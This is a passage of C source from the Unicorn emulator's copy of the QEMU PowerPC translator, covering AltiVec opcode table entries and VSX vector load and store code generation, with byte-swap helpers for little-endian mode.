0x4, opc2, opc3, 0x00000000, PPC_NONE, PPC2_ISA300), #define GEN_VXRFORM(name, opc2, opc3) \ GEN_VXRFORM1(name, name, #name, opc2, opc3) \ GEN_VXRFORM1(name##_dot, name##_, #name ".", opc2, (opc3 | (0x1 << 4))) #define GEN_VXRFORM_300(name, opc2, opc3) \ GEN_VXRFORM1_300(name, name, #name, opc2, opc3) \ GEN_VXRFORM1_300(name##_dot, name##_, #name ".", opc2, (opc3 | (0x1 << 4))) GEN_VXRFORM_300(vcmpnezb, 3, 4) GEN_VXRFORM_300(vcmpnezh, 3, 5) GEN_VXRFORM_300(vcmpnezw, 3, 6) GEN_VXRFORM(vcmpgtsb, 3, 12) GEN_VXRFORM(vcmpgtsh, 3, 13) GEN_VXRFORM(vcmpgtsw, 3, 14) GEN_VXRFORM(vcmpgtub, 3, 8) GEN_VXRFORM(vcmpgtuh, 3, 9) GEN_VXRFORM(vcmpgtuw, 3, 10) GEN_VXRFORM_DUAL(vcmpeqfp, vcmpequd, 3, 3, PPC_ALTIVEC, PPC_NONE) GEN_VXRFORM(vcmpgefp, 3, 7) GEN_VXRFORM_DUAL(vcmpgtfp, vcmpgtud, 3, 11, PPC_ALTIVEC, PPC_NONE) GEN_VXRFORM_DUAL(vcmpbfp, vcmpgtsd, 3, 15, PPC_ALTIVEC, PPC_NONE) GEN_VXRFORM_DUAL(vcmpequb, vcmpneb, 3, 0, PPC_ALTIVEC, PPC_NONE) GEN_VXRFORM_DUAL(vcmpequh, vcmpneh, 3, 1, PPC_ALTIVEC, PPC_NONE) GEN_VXRFORM_DUAL(vcmpequw, vcmpnew, 3, 2, PPC_ALTIVEC, PPC_NONE) #define GEN_VXFORM_DUAL_INV(name0, name1, opc2, opc3, inval0, inval1, type) \ GEN_OPCODE_DUAL(name0##_##name1, 0x04, opc2, opc3, inval0, inval1, type, \ PPC_NONE) GEN_VXFORM_DUAL_INV(vspltb, vextractub, 6, 8, 0x00000000, 0x100000, PPC_ALTIVEC), GEN_VXFORM_DUAL_INV(vsplth, vextractuh, 6, 9, 0x00000000, 0x100000, PPC_ALTIVEC), GEN_VXFORM_DUAL_INV(vspltw, vextractuw, 6, 10, 0x00000000, 0x100000, PPC_ALTIVEC), GEN_VXFORM_300_EXT(vextractd, 6, 11, 0x100000), GEN_VXFORM_DUAL_INV(vspltisb, vinsertb, 6, 12, 0x00000000, 0x100000, PPC_ALTIVEC), GEN_VXFORM_DUAL_INV(vspltish, vinserth, 6, 13, 0x00000000, 0x100000, PPC_ALTIVEC), GEN_VXFORM_DUAL_INV(vspltisw, vinsertw, 6, 14, 0x00000000, 0x100000, PPC_ALTIVEC), 
GEN_VXFORM_300_EXT(vinsertd, 6, 15, 0x100000), GEN_VXFORM_300_EO(vnegw, 0x01, 0x18, 0x06), GEN_VXFORM_300_EO(vnegd, 0x01, 0x18, 0x07), GEN_VXFORM_300_EO(vextsb2w, 0x01, 0x18, 0x10), GEN_VXFORM_300_EO(vextsh2w, 0x01, 0x18, 0x11), GEN_VXFORM_300_EO(vextsb2d, 0x01, 0x18, 0x18), GEN_VXFORM_300_EO(vextsh2d, 0x01, 0x18, 0x19), GEN_VXFORM_300_EO(vextsw2d, 0x01, 0x18, 0x1A), GEN_VXFORM_300_EO(vctzb, 0x01, 0x18, 0x1C), GEN_VXFORM_300_EO(vctzh, 0x01, 0x18, 0x1D), GEN_VXFORM_300_EO(vctzw, 0x01, 0x18, 0x1E), GEN_VXFORM_300_EO(vctzd, 0x01, 0x18, 0x1F), GEN_VXFORM_300_EO(vclzlsbb, 0x01, 0x18, 0x0), GEN_VXFORM_300_EO(vctzlsbb, 0x01, 0x18, 0x1), GEN_VXFORM_300(vpermr, 0x1D, 0xFF), #define GEN_VXFORM_NOA(name, opc2, opc3) \ GEN_HANDLER(name, 0x04, opc2, opc3, 0x001f0000, PPC_ALTIVEC) GEN_VXFORM_NOA(vupkhsb, 7, 8), GEN_VXFORM_NOA(vupkhsh, 7, 9), GEN_VXFORM_207(vupkhsw, 7, 25), GEN_VXFORM_NOA(vupklsb, 7, 10), GEN_VXFORM_NOA(vupklsh, 7, 11), GEN_VXFORM_207(vupklsw, 7, 27), GEN_VXFORM_NOA(vupkhpx, 7, 13), GEN_VXFORM_NOA(vupklpx, 7, 15), GEN_VXFORM_NOA(vrefp, 5, 4), GEN_VXFORM_NOA(vrsqrtefp, 5, 5), GEN_VXFORM_NOA(vexptefp, 5, 6), GEN_VXFORM_NOA(vlogefp, 5, 7), GEN_VXFORM_NOA(vrfim, 5, 11), GEN_VXFORM_NOA(vrfin, 5, 8), GEN_VXFORM_NOA(vrfip, 5, 10), GEN_VXFORM_NOA(vrfiz, 5, 9), #define GEN_VXFORM_UIMM(name, opc2, opc3) \ GEN_HANDLER(name, 0x04, opc2, opc3, 0x00000000, PPC_ALTIVEC) GEN_VXFORM_UIMM(vcfux, 5, 12), GEN_VXFORM_UIMM(vcfsx, 5, 13), GEN_VXFORM_UIMM(vctuxs, 5, 14), GEN_VXFORM_UIMM(vctsxs, 5, 15), #define GEN_VAFORM_PAIRED(name0, name1, opc2) \ GEN_HANDLER(name0##_##name1, 0x04, opc2, 0xFF, 0x00000000, PPC_ALTIVEC) GEN_VAFORM_PAIRED(vmhaddshs, vmhraddshs, 16), GEN_VAFORM_PAIRED(vmsumubm, vmsummbm, 18), GEN_VAFORM_PAIRED(vmsumuhm, vmsumuhs, 19), GEN_VAFORM_PAIRED(vmsumshm, vmsumshs, 20), GEN_VAFORM_PAIRED(vsel, vperm, 21), GEN_VAFORM_PAIRED(vmaddfp, vnmsubfp, 23), GEN_VXFORM_DUAL(vclzb, vpopcntb, 1, 28, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_DUAL(vclzh, vpopcnth, 1, 29, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_DUAL(vclzw, vpopcntw, 1, 30, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_DUAL(vclzd, vpopcntd, 1, 31, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_300(vbpermd, 6, 23), GEN_VXFORM_207(vbpermq, 6, 21), GEN_VXFORM_207(vgbbd, 6, 20), GEN_VXFORM_207(vpmsumb, 4, 16), GEN_VXFORM_207(vpmsumh, 4, 17), GEN_VXFORM_207(vpmsumw, 4, 18), GEN_VXFORM_207(vpmsumd, 4, 19), GEN_VXFORM_207(vsbox, 4, 23), GEN_VXFORM_DUAL(vcipher, vcipherlast, 4, 20, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_DUAL(vncipher, vncipherlast, 4, 21, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_207(vshasigmaw, 1, 26), GEN_VXFORM_207(vshasigmad, 1, 27), GEN_VXFORM_DUAL(vsldoi, vpermxor, 22, 0xFF, PPC_ALTIVEC, PPC_NONE),
unicorn-2.1.1/qemu/target/ppc/translate/vsx-impl.inc.c
/*** VSX extension ***/ static inline void get_cpu_vsrh(TCGContext *tcg_ctx, TCGv_i64 dst, int n) { tcg_gen_ld_i64(tcg_ctx, dst, tcg_ctx->cpu_env, 
vsr64_offset(n, true)); } static inline void get_cpu_vsrl(TCGContext *tcg_ctx, TCGv_i64 dst, int n) { tcg_gen_ld_i64(tcg_ctx, dst, tcg_ctx->cpu_env, vsr64_offset(n, false)); } static inline void set_cpu_vsrh(TCGContext *tcg_ctx, int n, TCGv_i64 src) { tcg_gen_st_i64(tcg_ctx, src, tcg_ctx->cpu_env, vsr64_offset(n, true)); } static inline void set_cpu_vsrl(TCGContext *tcg_ctx, int n, TCGv_i64 src) { tcg_gen_st_i64(tcg_ctx, src, tcg_ctx->cpu_env, vsr64_offset(n, false)); } static inline TCGv_ptr gen_vsr_ptr(TCGContext *tcg_ctx, int reg) { TCGv_ptr r = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, r, tcg_ctx->cpu_env, vsr_full_offset(reg)); return r; } #define VSX_LOAD_SCALAR(name, operation) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ gen_qemu_##operation(ctx, t0, EA); \ set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t0); \ /* NOTE: cpu_vsrl is undefined */ \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } VSX_LOAD_SCALAR(lxsdx, ld64_i64) VSX_LOAD_SCALAR(lxsiwax, ld32s_i64) VSX_LOAD_SCALAR(lxsibzx, ld8u_i64) VSX_LOAD_SCALAR(lxsihzx, ld16u_i64) VSX_LOAD_SCALAR(lxsiwzx, ld32u_i64) VSX_LOAD_SCALAR(lxsspx, ld32fs) static void gen_lxvd2x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } t0 = tcg_temp_new_i64(tcg_ctx); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); gen_qemu_ld64_i64(ctx, t0, EA); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t0); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); gen_qemu_ld64_i64(ctx, t0, EA); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), t0); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_lxvdsx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); gen_qemu_ld64_i64(ctx, t0, EA); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t0); tcg_gen_mov_i64(tcg_ctx, t1, t0); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), t1); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static void gen_lxvw4x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 xth; TCGv_i64 xtl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); if (ctx->le_mode) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, t0, EA, ctx->mem_idx, MO_LEQ); tcg_gen_shri_i64(tcg_ctx, t1, t0, 32); tcg_gen_deposit_i64(tcg_ctx, xth, t1, t0, 32, 32); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, t0, EA, ctx->mem_idx, MO_LEQ); tcg_gen_shri_i64(tcg_ctx, t1, t0, 32); tcg_gen_deposit_i64(tcg_ctx, xtl, t1, t0, 32, 32); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } else { tcg_gen_qemu_ld_i64(tcg_ctx, xth, EA, ctx->mem_idx, 
MO_BEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, xtl, EA, ctx->mem_idx, MO_BEQ); } set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); } static void gen_bswap16x8(TCGContext *tcg_ctx, TCGv_i64 outh, TCGv_i64 outl, TCGv_i64 inh, TCGv_i64 inl) { TCGv_i64 mask = tcg_const_i64(tcg_ctx, 0x00FF00FF00FF00FF); TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); /* outh = ((inh & mask) << 8) | ((inh >> 8) & mask) */ tcg_gen_and_i64(tcg_ctx, t0, inh, mask); tcg_gen_shli_i64(tcg_ctx, t0, t0, 8); tcg_gen_shri_i64(tcg_ctx, t1, inh, 8); tcg_gen_and_i64(tcg_ctx, t1, t1, mask); tcg_gen_or_i64(tcg_ctx, outh, t0, t1); /* outl = ((inl & mask) << 8) | ((inl >> 8) & mask) */ tcg_gen_and_i64(tcg_ctx, t0, inl, mask); tcg_gen_shli_i64(tcg_ctx, t0, t0, 8); tcg_gen_shri_i64(tcg_ctx, t1, inl, 8); tcg_gen_and_i64(tcg_ctx, t1, t1, mask); tcg_gen_or_i64(tcg_ctx, outl, t0, t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, mask); } static void gen_bswap32x4(TCGContext *tcg_ctx, TCGv_i64 outh, TCGv_i64 outl, TCGv_i64 inh, TCGv_i64 inl) { TCGv_i64 hi = tcg_temp_new_i64(tcg_ctx); TCGv_i64 lo = tcg_temp_new_i64(tcg_ctx); tcg_gen_bswap64_i64(tcg_ctx, hi, inh); tcg_gen_bswap64_i64(tcg_ctx, lo, inl); tcg_gen_shri_i64(tcg_ctx, outh, hi, 32); tcg_gen_deposit_i64(tcg_ctx, outh, outh, hi, 32, 32); tcg_gen_shri_i64(tcg_ctx, outl, lo, 32); tcg_gen_deposit_i64(tcg_ctx, outl, outl, lo, 32, 32); tcg_temp_free_i64(tcg_ctx, hi); tcg_temp_free_i64(tcg_ctx, lo); } static void gen_lxvh8x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 xth; TCGv_i64 xtl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); tcg_gen_qemu_ld_i64(tcg_ctx, xth, EA, ctx->mem_idx, MO_BEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, xtl, EA, ctx->mem_idx, MO_BEQ); if (ctx->le_mode) { gen_bswap16x8(tcg_ctx, xth, xtl, xth, xtl); } set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); } static void gen_lxvb16x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 xth; TCGv_i64 xtl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); tcg_gen_qemu_ld_i64(tcg_ctx, xth, EA, ctx->mem_idx, MO_BEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, xtl, EA, ctx->mem_idx, MO_BEQ); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); } #define VSX_VECTOR_LOAD(name, op, indexed) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ int xt; \ TCGv EA; \ TCGv_i64 xth; \ TCGv_i64 xtl; \ \ if (indexed) { \ xt = xT(ctx->opcode); \ } else { \ xt = DQxT(ctx->opcode); \ } \ \ if (xt < 32) { \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ } else { \ 
if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ } \ xth = tcg_temp_new_i64(tcg_ctx); \ xtl = tcg_temp_new_i64(tcg_ctx); \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ if (indexed) { \ gen_addr_reg_index(ctx, EA); \ } else { \ gen_addr_imm_index(ctx, EA, 0x0F); \ } \ if (ctx->le_mode) { \ tcg_gen_qemu_##op(tcg_ctx, xtl, EA, ctx->mem_idx, MO_LEQ); \ set_cpu_vsrl(tcg_ctx, xt, xtl); \ tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \ tcg_gen_qemu_##op(tcg_ctx, xth, EA, ctx->mem_idx, MO_LEQ); \ set_cpu_vsrh(tcg_ctx, xt, xth); \ } else { \ tcg_gen_qemu_##op(tcg_ctx, xth, EA, ctx->mem_idx, MO_BEQ); \ set_cpu_vsrh(tcg_ctx, xt, xth); \ tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \ tcg_gen_qemu_##op(tcg_ctx, xtl, EA, ctx->mem_idx, MO_BEQ); \ set_cpu_vsrl(tcg_ctx, xt, xtl); \ } \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, xth); \ tcg_temp_free_i64(tcg_ctx, xtl); \ } VSX_VECTOR_LOAD(lxv, ld_i64, 0) VSX_VECTOR_LOAD(lxvx, ld_i64, 1) #define VSX_VECTOR_STORE(name, op, indexed) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ int xt; \ TCGv EA; \ TCGv_i64 xth; \ TCGv_i64 xtl; \ \ if (indexed) { \ xt = xT(ctx->opcode); \ } else { \ xt = DQxT(ctx->opcode); \ } \ \ if (xt < 32) { \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ } else { \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ } \ xth = tcg_temp_new_i64(tcg_ctx); \ xtl = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, xth, xt); \ get_cpu_vsrl(tcg_ctx, xtl, xt); \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ if (indexed) { \ gen_addr_reg_index(ctx, EA); \ } else { \ gen_addr_imm_index(ctx, EA, 0x0F); \ } \ if (ctx->le_mode) { \ tcg_gen_qemu_##op(tcg_ctx, xtl, EA, ctx->mem_idx, MO_LEQ); \ tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \ tcg_gen_qemu_##op(tcg_ctx, xth, EA, ctx->mem_idx, MO_LEQ); \ } else { \ tcg_gen_qemu_##op(tcg_ctx, xth, EA, ctx->mem_idx, MO_BEQ); \ tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \ tcg_gen_qemu_##op(tcg_ctx, xtl, EA, ctx->mem_idx, MO_BEQ); \ } \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, xth); \ tcg_temp_free_i64(tcg_ctx, xtl); \ } VSX_VECTOR_STORE(stxv, st_i64, 0) VSX_VECTOR_STORE(stxvx, st_i64, 1) #ifdef TARGET_PPC64 #define VSX_VECTOR_LOAD_STORE_LENGTH(name) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_ptr xt; \ \ if (xT(ctx->opcode) < 32) { \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ } else { \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ } \ EA = tcg_temp_new(tcg_ctx); \ xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ gen_set_access_type(ctx, ACCESS_INT); \ gen_addr_register(ctx, EA); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, EA, xt, cpu_gpr[rB(ctx->opcode)]); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_ptr(tcg_ctx, xt); \ } VSX_VECTOR_LOAD_STORE_LENGTH(lxvl) VSX_VECTOR_LOAD_STORE_LENGTH(lxvll) VSX_VECTOR_LOAD_STORE_LENGTH(stxvl) VSX_VECTOR_LOAD_STORE_LENGTH(stxvll) #endif #define VSX_LOAD_SCALAR_DS(name, operation) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 xth; \ \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ xth = tcg_temp_new_i64(tcg_ctx); \ gen_set_access_type(ctx, ACCESS_INT); \ EA = 
tcg_temp_new(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0x03); \ gen_qemu_##operation(ctx, xth, EA); \ set_cpu_vsrh(tcg_ctx, rD(ctx->opcode) + 32, xth); \ /* NOTE: cpu_vsrl is undefined */ \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, xth); \ } VSX_LOAD_SCALAR_DS(lxsd, ld64_i64) VSX_LOAD_SCALAR_DS(lxssp, ld32fs) #define VSX_STORE_SCALAR(name, operation) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ get_cpu_vsrh(tcg_ctx, t0, xS(ctx->opcode)); \ gen_qemu_##operation(ctx, t0, EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } VSX_STORE_SCALAR(stxsdx, st64_i64) VSX_STORE_SCALAR(stxsibx, st8_i64) VSX_STORE_SCALAR(stxsihx, st16_i64) VSX_STORE_SCALAR(stxsiwx, st32_i64) VSX_STORE_SCALAR(stxsspx, st32fs) static void gen_stxvd2x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } t0 = tcg_temp_new_i64(tcg_ctx); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); get_cpu_vsrh(tcg_ctx, t0, xS(ctx->opcode)); gen_qemu_st64_i64(ctx, t0, EA); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); get_cpu_vsrl(tcg_ctx, t0, xS(ctx->opcode)); gen_qemu_st64_i64(ctx, t0, EA); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_stxvw4x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 xsh; TCGv_i64 xsl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xsh = tcg_temp_new_i64(tcg_ctx); xsl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xsh, xS(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xsl, xS(ctx->opcode)); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); if (ctx->le_mode) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t0, xsh, 32); tcg_gen_deposit_i64(tcg_ctx, t1, t0, xsh, 32, 32); tcg_gen_qemu_st_i64(tcg_ctx, t1, EA, ctx->mem_idx, MO_LEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_shri_i64(tcg_ctx, t0, xsl, 32); tcg_gen_deposit_i64(tcg_ctx, t1, t0, xsl, 32, 32); tcg_gen_qemu_st_i64(tcg_ctx, t1, EA, ctx->mem_idx, MO_LEQ); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } else { tcg_gen_qemu_st_i64(tcg_ctx, xsh, EA, ctx->mem_idx, MO_BEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_st_i64(tcg_ctx, xsl, EA, ctx->mem_idx, MO_BEQ); } tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, xsh); tcg_temp_free_i64(tcg_ctx, xsl); } static void gen_stxvh8x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 xsh; TCGv_i64 xsl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xsh = tcg_temp_new_i64(tcg_ctx); xsl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xsh, xS(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xsl, xS(ctx->opcode)); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); if (ctx->le_mode) { TCGv_i64 outh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 outl = tcg_temp_new_i64(tcg_ctx); gen_bswap16x8(tcg_ctx, outh, outl, xsh, xsl); tcg_gen_qemu_st_i64(tcg_ctx, outh, EA, ctx->mem_idx, MO_BEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); 
tcg_gen_qemu_st_i64(tcg_ctx, outl, EA, ctx->mem_idx, MO_BEQ); tcg_temp_free_i64(tcg_ctx, outh); tcg_temp_free_i64(tcg_ctx, outl); } else { tcg_gen_qemu_st_i64(tcg_ctx, xsh, EA, ctx->mem_idx, MO_BEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_st_i64(tcg_ctx, xsl, EA, ctx->mem_idx, MO_BEQ); } tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, xsh); tcg_temp_free_i64(tcg_ctx, xsl); } static void gen_stxvb16x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 xsh; TCGv_i64 xsl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xsh = tcg_temp_new_i64(tcg_ctx); xsl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xsh, xS(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xsl, xS(ctx->opcode)); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); tcg_gen_qemu_st_i64(tcg_ctx, xsh, EA, ctx->mem_idx, MO_BEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_st_i64(tcg_ctx, xsl, EA, ctx->mem_idx, MO_BEQ); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, xsh); tcg_temp_free_i64(tcg_ctx, xsl); } #define VSX_STORE_SCALAR_DS(name, operation) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 xth; \ \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ xth = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, xth, rD(ctx->opcode) + 32); \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0x03); \ gen_qemu_##operation(ctx, xth, EA); \ /* NOTE: cpu_vsrl is undefined */ \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, xth); \ } VSX_STORE_SCALAR_DS(stxsd, st64_i64) VSX_STORE_SCALAR_DS(stxssp, st32fs) static void gen_mfvsrwz(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (xS(ctx->opcode) < 32) { if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, 